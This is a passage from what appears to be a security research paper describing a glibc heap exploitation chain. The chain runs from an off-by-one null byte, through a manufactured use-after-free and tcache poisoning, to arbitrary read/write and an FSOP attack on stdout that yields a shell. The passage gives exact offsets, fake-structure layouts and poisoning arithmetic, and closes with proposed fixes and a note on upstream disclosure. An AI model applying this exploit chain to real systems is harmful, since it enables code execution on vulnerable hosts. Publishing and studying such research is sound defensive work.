  │  Program view (through tracking_table[B]):                 │
  │    "live allocation at E_user"                             │
  │    write(B, data) → writes to E_user → WRITES TO FREED     │
  │                       TCACHE METADATA                      │
  └────────────────────────────────────────────────────────────┘
Schrödinger's Chunk

The chunk is simultaneously:

Freed. The allocator sees it at the head of tcache[0x90].

Live. The program sees it as a valid allocation through handle B.

Writing through B is a use-after-free. The target program has no UAF bug. This primitive was manufactured entirely from three glibc bugs interacting:

Bug                                 Role
────────────────────────────────────────────────────────────────────────────────────────────────────
Bug 1: no cycle detection           Created the self-referencing loop → two handles
Bug 2: no count bound               num_slots = 8, allowed the re-free to pass the capacity guard
Bug 3: key clearing defeats gate    e->key = 0, Stage 1 gate failed, Stage 2 list walk never ran

None of them alone is sufficient. Each is load-bearing.

13

Phase 6 · Tcache poisoning and arbitrary allocation.

Through handle B we write to E_user, overwriting E->next in the freed chunk:

python · poison
target     = tracking_table_addr  # program's allocation array in BSS
safe_key   = E_user >> 12          # computed, no read needed (Bug 4)
poison     = safe_key ^ target     # PROTECT_PTR(E_user, target)

write(B):  E->next = poison

The tcache chain for bin 0x90 now reads:

state · chain redirected
tcache[0x90]:
  head → E_user → tracking_table → ???

Two more pops:

python · reclaim the target
malloc(0x88)   # returns E_user  (discard — this is the freed chunk)
malloc(0x88)   # returns tracking_table  ← ARBITRARY ALLOCATION

We hold an allocation overlapping the program's own bookkeeping. By editing this allocation we can redirect any entry's data pointer to any address. Full arbitrary read and write.

state · R/W primitive
┌─────────────────────────────────────────────────────────────────┐
│  tracking_table (BSS)          ← we have an allocation here     │
│                                                                  │
│  entry[0]:  data ptr ←── WE WRITE THIS to any target address    │
│             size      ←── and this                               │
│             in_use = 1                                           │
│  entry[1]:  ...                                                  │
│                                                                  │
│  Point entry[0].data to any address → read/write via show/edit  │
└─────────────────────────────────────────────────────────────────┘

14

Phase 7 · FSOP to shell.

Full RELRO eliminates GOT overwrites. The target is stdout's _IO_FILE structure in libc's data segment.

Since glibc 2.24, the regular vtable pointer in _IO_FILE_plus (at +0xd8) is range-validated against __libc_IO_vtables on every I/O operation. Pointing it outside this range causes an abort.

However, the wide character vtable, _wide_data->_wide_vtable, has no range check. _IO_wide_data is pointed to by stdout->_wide_data (at +0xa0). Inside _IO_wide_data, _wide_vtable lives at +0xe0. This field dispatches to __doallocate (at +0x68 in _IO_jump_t) when the wide character buffer needs initialization. No validation ever touches it.

dispatch · printf → shell
printf("prompt")
    │
    ▼  stdout->vtable = _IO_wfile_jumps  (legitimate — passes range check)
    │
    ▼  _IO_wfile_xsputn → _IO_wfile_overflow
    │    (wide buffer is NULL, needs allocation)
    │
    ▼  _IO_wdoallocbuf
    │
    ▼  fp->_wide_data->_wide_vtable->__doallocate(fp)
    │       ▲ NOT range-checked
    │
    ▼  our controlled function pointer
    │
    ▼  shell

We build fake structures in the overlap region at known addresses (deterministic layout, Bug 4):

layout · fake objects
prev_user + 0x100:  fake _IO_lock_t
  ┌─────────────────┐
  │  16 bytes zero  │  ← "unlocked" state for the stdio lock
  └─────────────────┘

prev_user + 0x200:  fake _IO_wide_data
  ┌──────────────────────────────────────────────────┐
  │  ...                                             │
  │  +0xe0:  _wide_vtable ptr → prev_user + 0x300    │
  └──────────────────────────────────────────────────┘

prev_user + 0x300:  fake _IO_jump_t (wide vtable)
  ┌──────────────────────────────────────────────────┐
  │  ...                                             │
  │  +0x68:  __doallocate → win()                    │
  └──────────────────────────────────────────────────┘

Four writes into stdout via the arbitrary write primitive:

stdout field   offset   value written        purpose
───────────────────────────────────────────────────────────────────────────────────────────────
_flags         +0x00    0xFBAD2000           clears _IO_UNBUFFERED, enables wide path
_lock          +0x88    prev_user + 0x100    our zeroed fake lock
_wide_data     +0xa0    prev_user + 0x200    our fake _IO_wide_data
vtable         +0xd8    _IO_wfile_jumps      legitimate, passes range check, triggers dispatch

The vtable write is the trigger. The next printf dispatches through _IO_wfile_jumps, reaches _IO_wdoallocbuf, reads stdout->_wide_data->_wide_vtable->__doallocate, finds our controlled pointer, and calls it.

Shell.

15

The full chain.

Full chain · null byte to shell · glibc 2.43
off-by-one null byte
    │
    ▼  fake chunk (fd=bk=self, size=0x501)
    │  all integrity checks satisfied
    ▼  PREV_INUSE cleared on victim
    │
    ▼  _int_free_merge_chunk: backward consolidation
       merged chunk 0xA00 at prev_user → unsorted bin
    │
    ▼  overlap: prev handle over free merged chunk
       read unsorted bin fd → libc base
    │
    ▼  carve E from overlap, free to tcache
       Bug 4 (lazy init): E_user computable → safe_key known
       write PROTECT_PTR(E,E) to E->next through overlap
       Bug 1 (no cycle detection): tcache[0x90] = E→E→E→...
    │
    ▼  double pop: A=E_user, B=E_user
       Bug 2 (no count bound): num_slots = 8, exceeds max
    │
    ▼  free(A): re-free E_user
       Bug 3 (key clearing bypasses gate): verify skipped
       Bug 2 (inflated count): tcache_put accepted
       write(B): UAF write to freed tcache metadata
    │
    ▼  tcache poison: E->next → tracking_table
       two pops → arbitrary allocation at tracking_table
    │
    ▼  arbitrary R/W via tracking_table overlay
    │
    ▼  FSOP: corrupt stdout
       _flags, _lock, _wide_data, vtable
       fake _IO_wide_data → fake _wide_vtable
       __doallocate (+0x68) → win()
    │
    ▼  shell
Full exploit chain · null byte → shell · every step verified against glibc 2.43.9000

16

What makes this different.

Prior techniques

Null byte poisoning and PREV_INUSE tricks produce chunk overlap and apply tcache poisoning from that overlap. They still need to read freed memory to recover the safe-linking key. One shot. Fixed geometry.

Schrödinger's Chunk

Synthesizes a genuine use-after-free from a program that has none. The manufactured UAF is a persistent read/write handle to freed memory, independent of the overlap region. Safe-linking key recovery is eliminated entirely. Bug 4 makes the key a function of heap base alone.

Three of the five bugs (1, 2, 3) interact tightly:

  • Bug 1 without Bug 2: the loop exists but the inflated num_slots is absent, and the re-free may be rejected by the capacity guard.
  • Bug 1 without Bug 3: the loop exists, but Stage 2 of double-free detection finds E in the list on the first scan iteration and aborts.
  • Bug 3 without Bug 1: the detection gate is bypassable only because the key was cleared by the pop, which only happened because the loop returned E twice.

The chain is multiplicative. Each bug is load-bearing.

17

Bug summary and proposed fixes.

Bug 1 · tcache_put_n, tcache_get_n
Defect: No cycle detection in tcache freelist.
Proposed fix: Check in tcache_put that the new entry address differs from any existing entry. Or in tcache_get, verify the returned address differs from the previous return.

Bug 2 · tcache_get_n
Defect: num_slots++ has no upper bound.
Proposed fix: Clamp to mp_.tcache_count on every increment.

Bug 3 · tcache_get_n, __libc_free
Defect: e->key = 0 on every pop defeats the double-free gate.
Proposed fix: Remove the key based gate and always walk the list. Or defer key clearing until re-free rather than on pop.

Bug 4 · tcache_free_init, tcache_init
Defect: Lazy init creates a fully deterministic heap layout.
Proposed fix: Add randomized padding before tcache struct allocation to break layout determinism.

Bug 5 · tcache_put_n
Defect: entries[] head pointers stored raw while next fields use PROTECT_PTR.
Proposed fix: Apply PROTECT_PTR consistently to head pointer assignments in the non-mangled path.

18

Conclusion.

Schrödinger's Chunk demonstrates that the heap exploitation landscape on modern glibc is not settled. A performance optimization (lazy tcache init) made safe-linking keys computable. Removing one allocation path (fastbins) concentrated all small-chunk traffic onto a path with five linked defects. A single null byte is enough to start the chain. A program with no UAF, no double-free, and every compiler mitigation active ends with a shell.

The five bugs were reported to the glibc security team prior to this publication.

Authored
Jabr (0xmadvise). Founder of DarkCov. Vulnerability researcher, exploit developer.
Meshaal. Research, DarkCov. Systems and memory. Paper co-author.
// Correspondence: research@darkcov.com. Discovery: 2026-03-02. Disclosure: upstream, prior to publication. Reproduction against glibc 2.43.9000 on Linux x86_64.